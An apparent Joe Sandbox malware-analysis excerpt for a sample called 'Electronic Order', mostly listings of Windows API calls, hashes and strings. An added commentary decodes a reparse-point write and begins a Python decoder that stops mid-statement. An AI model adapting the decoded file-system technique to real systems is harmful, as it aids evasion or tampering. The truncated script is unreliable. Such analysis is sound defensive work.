                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00E35335
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00E35340
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00E3534B
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00E35356
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00E35361
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00E3536C
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00E35377
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00E35382
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00E3538D
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00E35398
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00E353A3
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00E353AE
                                      • GetCursorInfo.USER32(?), ref: 00E353BE
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00E353E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
                                      • API String ID: 3215588206-0
                                      • Opcode ID: 5b525f6c788143e3634fb6d2e89c09a06fd857ea4366a1f0246f35d2a2132420
                                      • Instruction ID: 4c6345da6a117b03785c1f10faee4922039a8677c3877c4cc1c48d46c02b3142
                                      • Opcode Fuzzy Hash: 5b525f6c788143e3634fb6d2e89c09a06fd857ea4366a1f0246f35d2a2132420
                                      • Instruction Fuzzy Hash: 09417170E04319AADB109FBA8C49D6EFFF8EF51B10F10452FE519E7290DAB8A401CE61
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1AAA5
                                      • __swprintf.LIBCMT ref: 00E1AB46
                                      • _wcscmp.LIBCMT ref: 00E1AB59
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E1ABAE
                                      • _wcscmp.LIBCMT ref: 00E1ABEA
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E1AC21
                                      • GetDlgCtrlID.USER32(?), ref: 00E1AC73
                                      • GetWindowRect.USER32(?,?), ref: 00E1ACA9
                                      • GetParent.USER32(?), ref: 00E1ACC7
                                      • ScreenToClient.USER32(00000000), ref: 00E1ACCE
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E1AD48
                                      • _wcscmp.LIBCMT ref: 00E1AD5C
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E1AD82
                                      • _wcscmp.LIBCMT ref: 00E1AD96
                                        • Part of subcall function 00DE386C: _iswctype.LIBCMT ref: 00DE3874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: e692507d39ffe042013182c406686abfc6e48e35a5d90601652762389dae9c70
                                      • Instruction ID: 64e557f6c4ef321057994a95b123cd243ab66b80fe1ebb601b32d20e4ef73cd7
                                      • Opcode Fuzzy Hash: e692507d39ffe042013182c406686abfc6e48e35a5d90601652762389dae9c70
                                      • Instruction Fuzzy Hash: F3A1CE71205646AFD714DF20D884BFAF7E8FF44319F085629F999A2190DB30E985CBA2
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00E1B3DB
                                      • _wcscmp.LIBCMT ref: 00E1B3EC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E1B414
                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E1B431
                                      • _wcscmp.LIBCMT ref: 00E1B44F
                                      • _wcsstr.LIBCMT ref: 00E1B460
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1B498
                                      • _wcscmp.LIBCMT ref: 00E1B4A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E1B4CF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E1B518
                                      • _wcscmp.LIBCMT ref: 00E1B528
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00E1B550
                                      • GetWindowRect.USER32(00000004,?), ref: 00E1B5B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 3b8dfe90d599e6ead9267d73f61f08802cf467a83030b6ecafa70680663293f9
                                      • Instruction ID: 5f4ddd1ca63f84355c8b0ca1d4a58d4e496e0f16c171483b33570c2db09707f0
                                      • Opcode Fuzzy Hash: 3b8dfe90d599e6ead9267d73f61f08802cf467a83030b6ecafa70680663293f9
                                      • Instruction Fuzzy Hash: C781D0710043059FDB04DF11C885FEA7BE9EF44718F04906AFD95AA0A2EB34DD89CBA1
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • DragQueryPoint.SHELL32(?,?), ref: 00E4C917
                                        • Part of subcall function 00E4ADF1: ClientToScreen.USER32(?,?), ref: 00E4AE1A
                                        • Part of subcall function 00E4ADF1: GetWindowRect.USER32(?,?), ref: 00E4AE90
                                        • Part of subcall function 00E4ADF1: PtInRect.USER32(?,?,00E4C304), ref: 00E4AEA0
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4C980
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E4C98B
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E4C9AE
                                      • _wcscat.LIBCMT ref: 00E4C9DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E4C9F5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E4CA0E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4CA25
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E4CA47
                                      • DragFinish.SHELL32(?), ref: 00E4CA4E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E4CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
                                      • API String ID: 169749273-2073472848
                                      • Opcode ID: f02035785d5f74cda19f7c1f04c62b893f9e4ca9f22a58d1c1fc2011b99b0d8e
                                      • Instruction ID: 0f66eeac3953641a9103e51b38f665f707f6352591f387aa05868b45e52623dc
                                      • Opcode Fuzzy Hash: f02035785d5f74cda19f7c1f04c62b893f9e4ca9f22a58d1c1fc2011b99b0d8e
                                      • Instruction Fuzzy Hash: 6A617D71508301AFC701EF61DC85E9FBBE8EF89750F00092EF595A31A1DB709A49CBA2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 50c44ea9ac27249a35f1c01bd92ed13959c5931a728a384b39008edbc4f41f7b
                                      • Instruction ID: ed7c16cbd4b0abe3493b21e4d7d4aebc7ebab0dc40edb02e6c8e61fd4efa0ce1
                                      • Opcode Fuzzy Hash: 50c44ea9ac27249a35f1c01bd92ed13959c5931a728a384b39008edbc4f41f7b
                                      • Instruction Fuzzy Hash: BD318B31A04306A6DB14FAA1DD43EEE77A8EF20750F605129F415B20E2EF61AE48CA71
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 00E1C4D4
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E1C4E6
                                      • SetWindowTextW.USER32(?,?), ref: 00E1C4FD
                                      • GetDlgItem.USER32(?,000003EA), ref: 00E1C512
                                      • SetWindowTextW.USER32(00000000,?), ref: 00E1C518
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C528
                                      • SetWindowTextW.USER32(00000000,?), ref: 00E1C52E
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E1C54F
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E1C569
                                      • GetWindowRect.USER32(?,?), ref: 00E1C572
                                      • SetWindowTextW.USER32(?,?), ref: 00E1C5DD
                                      • GetDesktopWindow.USER32 ref: 00E1C5E3
                                      • GetWindowRect.USER32(00000000), ref: 00E1C5EA
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E1C636
                                      • GetClientRect.USER32(?,?), ref: 00E1C643
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E1C668
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E1C693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 7989e9880e81e6ab2ea7b5783756f32b1a06ea4866acce8e3f5b0186fd4a7d0c
                                      • Instruction ID: db027ee00bfab576aab9ce65a69f9531168f50456dffeb1184a296bfbfd0af57
                                      • Opcode Fuzzy Hash: 7989e9880e81e6ab2ea7b5783756f32b1a06ea4866acce8e3f5b0186fd4a7d0c
                                      • Instruction Fuzzy Hash: B0515E70900709AFDB209FA9DD89BAEBBF5FF04B05F104528E696F25A0C774B945CB50
                                      APIs
                                      • _memset.LIBCMT ref: 00E4A4C8
                                      • DestroyWindow.USER32(?,?), ref: 00E4A542
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E4A5BC
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E4A5DE
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4A5F1
                                      • DestroyWindow.USER32(00000000), ref: 00E4A613
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DC0000,00000000), ref: 00E4A64A
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E4A663
                                      • GetDesktopWindow.USER32 ref: 00E4A67C
                                      • GetWindowRect.USER32(00000000), ref: 00E4A683
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E4A69B
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E4A6B3
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      • Opcode ID: ded244737c86b9c68ceba50ccbfed8c6152be53921edb5095406eb35106c4088
                                      • Instruction ID: f66554a2e8d353c5513f8804b6a69db1c4e88464d5bd3c7465771c7a3dc30c84
                                      • Opcode Fuzzy Hash: ded244737c86b9c68ceba50ccbfed8c6152be53921edb5095406eb35106c4088
                                      • Instruction Fuzzy Hash: CE71DD71180205AFD724CF28DC49F6A7BE5FB88714F49456DF989A72A0C770E906CF62
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00E446AB
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E446F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: 31dc5c5a926ad2f1f0b6f86dc9760aa4682ca426c49b0e4506cb5eecd50a18cf
                                      • Instruction ID: 215ef2e5a665df89d13d10e9b52d749905b25269d46a84dadb59971fae16b2d5
                                      • Opcode Fuzzy Hash: 31dc5c5a926ad2f1f0b6f86dc9760aa4682ca426c49b0e4506cb5eecd50a18cf
                                      • Instruction Fuzzy Hash: 5F9161742047029FCB14EF20D451BAAB7E1EF84314F05A45DF89A6B7A2DB70ED46CB61
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E4BB6E
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E49431), ref: 00E4BBCA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4BC03
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E4BC46
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E4BC7D
                                      • FreeLibrary.KERNEL32(?), ref: 00E4BC89
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E4BC99
                                      • DestroyIcon.USER32(?,?,?,?,?,00E49431), ref: 00E4BCA8
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E4BCC5
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E4BCD1
                                        • Part of subcall function 00DE313D: __wcsicmp_l.LIBCMT ref: 00DE31C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      • Opcode ID: ba804bd891910f53c182fe462c277b9073f0f9adb9f39c7bb00c7c738a005d1d
                                      • Instruction ID: 063d220434efebbe34dcdbaa61d49ded65df285dc2f44b1aafffe82af2cb2712
                                      • Opcode Fuzzy Hash: ba804bd891910f53c182fe462c277b9073f0f9adb9f39c7bb00c7c738a005d1d
                                      • Instruction Fuzzy Hash: F061E271900215BEEB14DF65DC86FBEB7A8EB08B14F10411AF815E61C0DB74DA95CBA0
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00E4FB78), ref: 00E2A0FC
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E2A11E
                                      • __swprintf.LIBCMT ref: 00E2A177
                                      • __swprintf.LIBCMT ref: 00E2A190
                                      • _wprintf.LIBCMT ref: 00E2A246
                                      • _wprintf.LIBCMT ref: 00E2A264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                      • API String ID: 311963372-1048875529
                                      • Opcode ID: 8b1810f64e24551be6a12b3f72dc1dc427d924a3b66a58bac5eb7e8f1e169f5b
                                      • Instruction ID: a5da5b5d6b742891dde77fc38c8dee0d0235a400898800d600632539011a0dbf
                                      • Opcode Fuzzy Hash: 8b1810f64e24551be6a12b3f72dc1dc427d924a3b66a58bac5eb7e8f1e169f5b
                                      • Instruction Fuzzy Hash: B151297290021AABCB15EBE0DD86EEEB779EF04300F1451A9B505730A1EB316E99DF71
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CharLowerBuffW.USER32(?,?), ref: 00E2A636
                                      • GetDriveTypeW.KERNEL32 ref: 00E2A683
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A6CB
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A702
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E2A730
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      • Opcode ID: 4746307810f7cd247a129a2481cccac073bfc20e2d28ae6a3d8b8035556a89b0
                                      • Instruction ID: 4d3a52de0b3e1cabe6c1acbdc3f2c64dc0d110ff9cccd62bcbec5a05ae2f5e4c
                                      • Opcode Fuzzy Hash: 4746307810f7cd247a129a2481cccac073bfc20e2d28ae6a3d8b8035556a89b0
                                      • Instruction Fuzzy Hash: B0514D711043059FC700EF21D891D6AB7F4EF94718F18996DF89AA7251DB31AE0ACB62
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2A47A
                                      • __swprintf.LIBCMT ref: 00E2A49C
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2A4D9
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E2A4FE
                                      • _memset.LIBCMT ref: 00E2A51D
                                      • _wcsncpy.LIBCMT ref: 00E2A559
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E2A58E
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A599
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00E2A5A2
                                      • CloseHandle.KERNEL32(00000000), ref: 00E2A5AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: edca7f150eccdf8d5bc6c9ad3b3673ba39afab44f1337076bbe90b21f217d5f0
                                      • Instruction ID: 096c49d698ff0baa67f9a8d3f8c275f5867f24ef09683d9a30f221202ec42273
                                      • Opcode Fuzzy Hash: edca7f150eccdf8d5bc6c9ad3b3673ba39afab44f1337076bbe90b21f217d5f0
                                      • Instruction Fuzzy Hash: BA31B0B5500219ABDB219FA1EC49FEB73BCEF89705F1441B6FA08E2160E77097458B35
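The CreateDirectoryW / CreateFileW / DeviceIoControl / RemoveDirectoryW sequence in the record above only reads clearly once its numeric arguments are decoded: 0x000900A4 is the control code FSCTL_SET_REPARSE_POINT, 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (a directory handle that addresses the reparse point itself rather than whatever it points to), 0x40000000 is GENERIC_WRITE with an exclusive share mode and OPEN_EXISTING, and the `\??\%s` string is the NT-namespace prefix a reparse point's substitute name carries. Together they read as: create a directory, open it as a reparse point, attach a reparse tag to it, and remove the directory again on the failure path. The decoder below is an added example, not part of the Joe Sandbox report or of the sample's code; its constant tables are the standard Win32 SDK values, but the FSCTL name table deliberately covers only the three reparse-point control codes, and `is_reparse_point_write` is a helper name chosen here for illustration.

```python
"""Added example (not part of the Joe Sandbox report or of the sample's own
code): decode the numeric arguments printed for the CreateFileW and
DeviceIoControl calls so the sequence can be read as a reparse-point write."""

# CTL_CODE(DeviceType, Function, Method, Access) packs its four fields as
# (DeviceType << 16) | (Access << 14) | (Function << 2) | Method.
FILE_DEVICE_FILE_SYSTEM = 0x09
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
# Only the three reparse-point FSCTLs are tabulated (function numbers 41..43
# under FILE_DEVICE_FILE_SYSTEM); any other code decodes to its fields only.
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT",
                   42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def decode_ioctl(code: int) -> dict:
    """Split an I/O control code into its CTL_CODE fields and name it if known."""
    device = (code >> 16) & 0xFFFF
    function = (code >> 2) & 0xFFF
    name = FSCTL_FUNCTIONS.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {
        "device": device,
        "access": (code >> 14) & 0x3,
        "function": function,
        "method": METHODS[code & 0x3],
        "name": name,
    }


# CreateFileW argument tables (standard winnt.h / fileapi.h values).
GENERIC_RIGHTS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH",
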